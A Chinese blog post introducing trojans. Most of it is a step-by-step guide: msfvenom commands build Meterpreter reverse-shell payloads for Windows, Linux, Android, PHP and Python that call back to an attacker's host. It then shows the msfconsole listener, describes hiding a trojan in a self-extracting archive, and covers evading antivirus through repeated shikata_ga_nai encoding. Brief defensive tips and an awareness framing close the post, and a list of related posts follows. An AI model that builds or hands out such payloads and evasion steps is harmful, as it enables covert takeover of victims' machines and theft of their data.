Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >浅谈木马

浅谈木马

作者头像
用户10781703
发布于 2023-10-10 05:39:37
发布于 2023-10-10 05:39:37
6240
举报

浅谈木马远控

在听过某网安教育关于浅谈的公开课后,结合本人学过的东西,以及自己实践过的经历。在此分享下木马对我们的影响。

环境:

攻击者:kali

目标主机:Windows

一、了解木马

1.木马,又称为特洛伊木马

特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。古希腊围攻特洛伊许久却无法攻下,于是有人想到了个办法。制作了一个很高很大的木马作为战神马,内部可装士兵,佯攻几天后装作无功而返,留下木马。特洛伊解围后认为自己胜利了,还看到了敌人留下的木马,便作为战利品收入城中,全城举杯庆祝。到了午夜时分,藏匿于木马中的士兵便打开了城门,四处纵火,城外伏兵涌入,很容易便得到了城池。   在如今,我们常将寄宿在计算机中的未授权的远程控制程序称为特洛伊木马。它可以计算机管理员未发觉的情况下执行命令、泄露用于信息、甚至可以窃取管理员用户权限。如今已成为黑客常用的工具之一。

2.木马原理、结构

原理:特洛伊木马是一道程序,藏匿于计算机中,通过对开启计算机的某一端口进行监听,在接受到数据后进行识别,再对计算机执行相应的操作。

其本质是占用一个端口与攻击者进行通信的网络程序。

结构:

(1)客户端

客户端程序

客户端程序是攻击者的控制台,它负责远程遥控指挥。

(2)服务器

服务器端程序

服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。

二、制作简易木马

此处我们利用msfvenom制作木马程序。

Windows木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe

-p 载荷(payload),用于反弹shell

lhost=       这里写的是攻击者的IP

lport=       这里写的是攻击者主机上用于监听的端口(任意未被占用的端口)

-f 文件类型

-o 输出的文件名

Linux木马

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f elf -o muma.elf

android木马

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -o muma.apk

php木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.php

python木马

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.py

利用msfvenom制作木马时,选择payload和文件类型需要注意。

三、木马的危害

由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。

这里我们直接将制作好的木马放在一个Windows主机中(网络互通),然后在客户端(攻击者)利用msfconsole开启监听

msfconsole

use exploit/multi/handler       #进入监听模块

set payload windows/meterpreter/reverse_tcp       #加载payload模块

set lhost       本机IP

set lport 4444

exploit/run

开启监听后,我们在目标主机上运行一下木马程序。

此时我们可以看到已经连接上了木马程序。

当我们的电脑被木马控制后,我们电脑中的信息可能会被泄露,包括系统信息、用户存储在电脑上的数据信息等。

除过电脑上的信息可能会被攻击者窃取,攻击者还可能控制电脑对数据进行删改,可以上传和下载文件,盗取计算机中的密码等操作。甚至可以以感染了木马的主机为跳板,攻击该网络下的其他主机等操作。

可能到了这里有人会觉得这些木马很简单,很容易就被目标发现。

攻击者想要在不被发现的情况下在目标主机上种下木马,可以进行木马捆绑、免杀、伪装等操作。

木马捆绑:

制作自解压木马(准备一个木马、一个图片、一个压缩软件即可)

攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。(当你从一些奇怪的地方下载了一些奇怪的压缩包的时候,可能这个压缩包里面就捆绑了木马,当你一解压,它会自动运行里面的木马程序。)

可能很多时候我们的杀毒软件够强大,可以检测到捆绑了木马的压缩文件。然而攻击者还有方法。

木马免杀:

攻击者可以对木马程序进行一些免杀操作,从而绕过一些防护软件。

常用到的免杀方法有:编码加密、加壳(压缩算法)、利用一些工具进行免杀等。

在利用msfvenom制作木马时,可以使用-e x86/shikata_ganai参数进行加密。

Msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe

-e 编码的方式 -i 编码次数 -b不使用十六进制00

一些其他的编码方式,可以使用msfvenom -l encoders命令查看

四、木马防护

1.木马的传播途径

(1)利用下载进行传播

(2)利用系统漏洞传播

(3)利用邮件传播

(4)利用即使通信传播

(5)利用网页传播

(6)利用蠕虫病毒传播等

2.木马的防范与查杀

(1)首先安装杀毒软件

(2)不执行奇怪的软件,使用的软件尽量从官方下载安装

(3)不随便打开奇怪的邮件

(4)尽量少使用或者不使用共享文件夹

(5)不点击奇怪的链接等

本文只是简单讨论下木马远控,为了提高自己和身边亲友的安全意识,后期会有对木马的深入探讨。本文可能会有很多遗漏的地方和不对的地方,欢迎各位大佬指点,文中很多是个人观点,也欢迎各位朋友发表自己的观点看法。

欢迎投稿

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-10-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
使用kali msfvenom编写远控木马“实验”
打开终端并输入以下命令:msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]
用户10508869
2023/04/22
2.2K0
使用kali  msfvenom编写远控木马“实验”
Metasploit 学习记录
一直在用 Metasploit,但是从来没有花时间仔细去研究这个工具,最近得空就系统的研究研究,故于此记录之。
小简
2023/01/04
2.5K0
Metasploit 学习记录
msf工具之木马程序制作以及伪装
将木马程序点击执行,监听端口得到回应,成功控制电脑 输入shell,彻底控制电脑
行云博客
2020/09/16
2.4K0
msf工具之木马程序制作以及伪装
工具的使用-msfvenom
Kali里面有一个集成好的工具是msfvenom,主要用于生成后门和软件捆绑后门,其免杀效果还算不错。
字节脉搏实验室
2020/11/06
1K0
工具的使用-msfvenom
掩日免杀笔记_在线笔记
大家好,又见面了,我是你们的朋友全栈君。 微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 环境 攻击机: kali linux 10.211.55.23 受害机: Windows10 360主动防御 Windows7 火绒主动防御 2. 生成exe文件 在kali linux下使用msfvenom生成一个64位的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f ex
全栈程序员站长
2022/09/23
4450
掩日免杀笔记_在线笔记
红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]
盛透侧视攻城狮
2024/12/25
4230
红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]
msfvenom木马生成及运用
今天简单给大家分享一下msfvenom。kali中一个经常会用到的框架,今天主要的介绍内容是木马程序的生成和后渗透一些提权。
网e渗透安全部
2022/12/01
1.4K0
msfvenom木马生成及运用
后渗透学习笔记(一)
攻陷了服务器,主机取得一定权限(可能不是很高)就开始进入了后渗透阶段 把对方机器打蓝屏重启有什么作用? 使得我们修改注册表等配置信息可以生效 windows的控制权限UAC,重启才可以生效,可以使用远程溢出蓝屏,用户可能会以为是bug,意外情况,所以不会注意,从而使修改信息生效 1.权限提升:权限提升的几种方式 (1)利用更高权限的进程进行操作,获得会话session (2)windows下的用户控制,exe执行时弹出的框问你是否要执行,这个东西就是UAC (3)利用服务器里面的本地提权漏洞进行权限提升(会在msf中)
字节脉搏实验室
2020/03/08
3.3K0
kali Linux外网渗透控制Android安卓手机系统。
就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
知识与交流
2024/03/11
2.3K0
kali Linux外网渗透控制Android安卓手机系统。
msfconsole学习
指令:show options – 查看需要填写的参数和参数填写状态
全栈程序员站长
2022/10/04
7780
msf之木马程序
这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134
宸寰客
2020/09/18
2.1K0
msf之木马程序
安全攻防 | MSF生成Payload方式总结
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
安全小王子
2023/02/25
8850
安全攻防 | MSF生成Payload方式总结
远控免杀专题文章(3)-msf自免杀(VT免杀率35/69)
1、远控免杀专题文章(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg
Ms08067安全实验室
2020/02/21
2K0
msfconsole入门(一)
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
逍遥子大表哥
2021/12/17
6620
msfconsole入门(一)
工具的使用 | Msfvenonm生成木马
在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter
谢公子
2022/01/19
1.7K0
工具的使用 | Msfvenonm生成木马
红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
3960
红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]
kali下androidshell那些事
在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下:
逍遥子大表哥
2021/12/17
6050
kali下androidshell那些事
红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
2370
红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]
Metasploit的简单木马免杀技术及后渗透面临的问题
PS:本文仅用于技术交流与分享,严禁用于非法用途 一. 配置ngrok准备内网穿透 内网穿透的必要性和原理就不用说了,直接说操作。首先到ngrok官网去注册一个号,国内也有一个sunny ngrok,
FB客服
2018/04/17
1.7K0
Metasploit的简单木马免杀技术及后渗透面临的问题
反弹shell的学习总结 - Part 2
dnscat2(https://github.com/iagox86/dnscat2)是一个DNS隧道,旨在通过DNS协议创建加密的命令和控制(C&C)通道。dnscat2分为两部分:客户端和服务端。dnscat2客户端采用C语言编写,服务器端采用ruby语言编写。后来又有安全研究人员使用PowerShell脚本重写了dnscat2客户端dnscat2-powershell(https://github.com/lukebaggett/dnscat2-powershell)。
安全小王子
2020/07/31
2K0
反弹shell的学习总结 - Part 2
推荐阅读
相关推荐
使用kali msfvenom编写远控木马“实验”
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档